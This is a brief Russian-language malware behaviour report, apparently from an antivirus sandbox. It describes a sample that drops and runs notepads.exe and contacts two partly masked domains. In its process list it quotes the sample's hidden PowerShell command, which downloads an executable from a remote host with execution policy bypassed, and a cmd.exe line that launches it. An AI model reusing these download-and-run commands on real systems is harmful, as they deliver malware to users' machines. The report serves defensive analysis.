Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ve###vor-ua.net/bqmimdqy/notepads.exe как %appdata%\notepads.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\notepads.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\dzdtfhgygeghdzВ .sct
- %APPDATA%\notepads.exe
Удаляет следующие файлы
- %TEMP%\dzdtfhgygeghdzВ .sct
Сетевая активность
Подключается к
- 've###vor-ua.net':80
- 're###armo.com':80
TCP
Запросы HTTP GET
- http://ve###vor-ua.net/bqMiMDqy/notepads.exe
- http://re###armo.com/macfolderfilesloadsonedrivedocumentsuploadsgoogledownloads/Qxuzyrzjekh
UDP
- DNS ASK ve###vor-ua.net
- DNS ASK re###armo.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\notepads.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\notepads.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ve###vor-ua.net/bqMiMDqy/notepads.exe','%APPDATA%\notepads.exe')' (со скрытым окном)
